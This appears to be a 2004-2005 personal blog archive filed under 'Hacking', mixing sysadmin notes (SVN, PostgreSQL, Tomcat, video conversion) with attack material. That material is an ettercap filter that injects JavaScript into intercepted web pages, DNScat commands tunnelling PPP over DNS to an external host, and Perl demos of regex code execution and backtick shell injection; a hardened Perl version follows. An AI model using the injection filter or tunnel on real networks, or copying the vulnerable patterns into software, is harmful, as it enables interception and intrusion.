Archive for the 'Hacking' Category

Injecting JavaScript with ettercap

Monday, August 15th, 2005

This should inject JavaScript that gets your local IP address:

replace("^</BODY>","<script>s1 = \"error\";s2 = \"error\";try { so = new java.net.Socket(); so.bind(new java.net.InetSocketAddress(\"0.0.0.0\",0)); so.connect(new java.net.InetSocketAddress(document.domain,80)); s1 = so.getLocalAddress().getHostAddress(); s2 = so.getLocalAddress().getHostName(); so.close(); } catch (e) { document.writeln(e); } alert(\"Client's IP: \"+ s1 + \"(\"+s2+\")\"); </script></BODY>");

You need to compile this filter with etterfilter and run it with "ettercap -F <filter.ef>".

Haven’t tried it but it should work.

Parsing HTTP records (one-liner)

Monday, August 15th, 2005

Extracting triples (host, referrer, GET) from HTTP connection packets (prints stuff on "."):

perl -ne '$get = $1 if /^GET ([^\s]*) /; $host = $1 if /^Host: ([^\s]*)/; $ref=$1 if /^Referer: ([^\s]*)/; if (/^.$/) { print "ID, $host, $get, $ref\n";}'

Perl one-liner: Adding all new files to SVN

Wednesday, June 22nd, 2005

svn add `svn status | perl -ne '/\?\s*(.*)/ && print "$1 "'`

Converting SVN from Berkeley DB to FSFS

Tuesday, June 14th, 2005
  1. svnadmin dump <repository> > <dumpfile>
  2. move the repository somewhere else.
  3. svnadmin create --fs-type=fsfs <repository>
  4. svnadmin load <repository> < <dumpfile>

Rotating the movie from Canon G3

Tuesday, May 10th, 2005

mencoder motorola_and_p900.avi -o m1.avi -oac copy -vop rotate=1 -ovc lavc

Tried -ovc =xvid, but it segfaults

Optimizing Postgresql

Thursday, February 24th, 2005

Rene discovered nice options in postgresql.conf

- Planner Method Enabling -

enable_hashagg = true

enable_hashjoin = true

enable_indexscan = true

enable_mergejoin = true

enable_nestloop = true

enable_seqscan = true

enable_seqscan = false

enable_sort = true

enable_tidscan = true


Tomcat4 – client authentication findings

Thursday, November 25th, 2004
  1. MemoryRealm works fine.
  2. UserDatabase doesn’t work. The code is OK, but apparently, while parsing the server.xml file and creating the UserDatabase declared there, the server creates some kind of property file (MBeans), which of course cannot be created for a property that contains the ‘=’ sign. Therefore it fails.
  3. Other realms could possibly work, but they don’t implement the authenticate(cert[]) function, which is called to verify the certificates. It’s a bit of a shame and I really don’t see why it could not work.

Pointers from “Innocent Code”

Wednesday, November 10th, 2004

Just a few interesting pointers to tools from a book I read:

  • WHArsenal – www.whitesec.com (doesn’t seem to be available anymore)
  • HTTPush – on the fly modification of requests (in Perl)
  • WEBScarab – http://www.owasp.org/software/webscarab.html
  • Spikeproxy – http://packages.debian.org/unstable/net/spikeproxy.html
  • PenProxy – http://shh.thathost.com/pub-java/html/PenProxy.html

DNScat works!

Sunday, October 31st, 2004

pppd noauth debug nodetach passive 10.0.0.1:10.0.0.2 pty "./DNScatServer -o tadekp.afraid.org -p 50000"

pppd noauth debug nodetach pty "./DNScatClient -o tadekp.afraid.org"

Perl injection

Thursday, October 28th, 2004

#!/usr/bin/perl -w

use re 'eval'; # this evil command enables it!

$a = "bla";
$user_input = "(?{print \"we're executing this code ;-) \n\";})";
$a =~ /$user_input/;

#!/usr/bin/perl -w

@files=`ls $ARGV[0]`;
print "file list: @files\n";
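
Hardened counterparts of the two scripts above, as an added example that is not code from the original post. The sub names and sample inputs are constructed for illustration: the pattern is compiled without `use re 'eval'` or matched as a literal via `\Q...\E`, and the directory is read with `opendir` so no shell ever sees the argument.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed sample inputs standing in for untrusted data.
my $pattern_input = '(?{ print "injected\n" })';
my $dir_input     = '/tmp; echo injected';

# Without "use re 'eval'" in scope, Perl refuses to compile a pattern
# interpolated at run time that contains a (?{ ... }) code block.
# The eval block also catches syntactically invalid patterns.
sub match_as_regex {
    my ($text, $input) = @_;
    my $matched = eval { $text =~ /$input/ ? 1 : 0 };
    return $matched if defined $matched;
    chomp(my $err = $@);
    return "rejected: $err";
}

# \Q...\E (quotemeta) escapes every metacharacter, so the input is
# only ever compared as a literal substring.
sub match_literal {
    my ($text, $input) = @_;
    return $text =~ /\Q$input\E/ ? 1 : 0;
}

# opendir/readdir list a directory without spawning a shell, so ';',
# '|' or backticks in the name are just characters of a path.
sub list_dir {
    my ($dir) = @_;
    opendir(my $dh, $dir) or return;
    my @names = sort grep { $_ ne '.' && $_ ne '..' } readdir($dh);
    closedir($dh);
    return @names;
}

print "regex:   ", match_as_regex('bla', $pattern_input), "\n";
print "literal: ", match_literal('bla', $pattern_input), "\n";
print "files:   @{[ list_dir($dir_input) ]}\n";
```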